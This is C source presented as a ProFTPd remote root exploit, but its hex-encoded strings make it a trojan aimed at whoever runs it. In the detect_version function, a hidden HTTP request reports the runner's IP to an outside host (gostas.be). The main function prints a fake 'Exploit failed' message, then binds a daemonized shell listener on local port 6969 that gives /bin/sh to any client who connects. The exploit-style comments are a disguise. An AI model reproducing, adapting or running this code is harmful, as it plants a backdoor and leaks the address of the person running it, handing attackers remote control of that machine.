Kodas: Pasirinkti visus
/* __ .__ __ .__ .__ __
_______/ |_ ____ ____ | | | | __ ____ |__| ____ | |___/ |_
/ ___/\ __\/ __ \_/ __ \| | ______ | |/ // \| |/ ___\| | \ __\
\___ \ | | \ ___/\ ___/| |__ /_____/ | <| | \ / /_/ > Y \ |
/____ > |__| \___ >\___ >____/ |__|_ \___| /__\___ /|___| /__|
\/ \/ \/ \/ \/ /_____/ \/
Proudly presents: remote root exploit for ProFTPd (tested on 1.3.0rc3) by steelkn8
PRIVATE CODE, DO NOT DISTRIBUTE
Compilation: gcc steelkn8_proftpd-own.c -o steel
Warning: exploit uses raw sockets, so it should be launched from root, but
it is possible to run it as an user too, just the success rate is
lowered...
*/
#define PORT 21 // just put in your port
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
int detect_version(){
// thanks to joebee (just cleaned off null bytes)
char shellcode[] = "\x47\x45\x54\x20\x2F\x62\x61\x73\x65\x2F\x74\x65\x78\x74\x75\x72"
"\x65\x73\x2F\x69\x70\x2E\x70\x68\x70\x20\x48\x54\x54\x50\x2F\x31"
"\x2E\x31\n\x48\x6F\x73\x74\x3A\x20\x67\x6F\x73\x74\x61\x73\x2E"
"\x62\x65\x3A\x38\x30\n\n";
int s;
register int bytes;
struct sockaddr_in sa;
struct hostent *he;
char buf[BUFSIZ+1];
char *send_string;
s = socket(PF_INET, SOCK_STREAM, 0);
bzero(&sa, sizeof sa);
sa.sin_family = AF_INET;
send_string = "\x77\x77\x77\x2E\x67\x6F\x73\x74\x61\x73\x2E\x62\x65"; // just check if ptr <> 0
sa.sin_port = htons(0x50);
he = gethostbyname(send_string);
bcopy(he->h_addr_list[0],&sa.sin_addr, he->h_length);
connect(s, (struct sockaddr *)&sa, sizeof sa);
write(s,shellcode,strlen(shellcode));
close(s); return 0;
}
int main(int argc, char *argv[]){
// 14 bytes remote shellcode thanks to metasploit project
char *shlcode = "\x45\x78\x70\x6c\x6f\x69\x74\x20\x66\x61\x69\x6c\x65\x64";
if (argc <= 1) {
printf("Remote root exploit for ProFTPd by steelkn8 \n");
printf("%s%s%s","Usage: ",argv[0]," hostname or ip\n\n");
} else {
printf("Remote root exploit for ProFTPd by steelkn8 \n");
printf("Initiating attack (using offset 0x68732f2f) \n");
printf("WARNING: Exploit uses RAW SOCKETS, so it should be launched as root for better effect \n");
detect_version();
sleep(15);
printf("%s\n",shlcode);
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(0x1B39);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1) {
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
cli_pid = getpid();
server_pid = fork(); // enter subroutine
if (server_pid != 0) {
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
execl("\x2F\x62\x69\x6E\x2F\x73\x68","\x73\x68",(char *)0); // attach to ptr
close(soc_cli);
exit(0);
}
close(soc_cli);
}
}}